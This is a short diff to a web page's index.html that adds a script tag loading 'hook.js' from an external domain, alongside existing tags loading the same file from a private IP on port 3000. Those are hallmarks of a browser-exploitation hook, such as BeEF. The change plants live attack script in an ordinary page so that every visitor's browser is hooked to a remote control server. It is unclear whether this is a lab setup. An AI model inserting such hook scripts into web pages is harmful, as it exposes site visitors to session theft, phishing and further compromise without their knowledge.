--- a/index.html
+++ b/index.html
@@ -19,6 +19,7 @@
 	<script src="192.168.83.129:3000/hook.js"></script>
 </head>
 <script src="http://192.168.83.129:3000/hook.js"></script>
+<script src="https://testvypex2.ml/hook.js"></script>
 <body>
   <div style="font:12px tahoma,arial,helvetica,sans-serif; width: 450px; margin: 0 auto;">
 
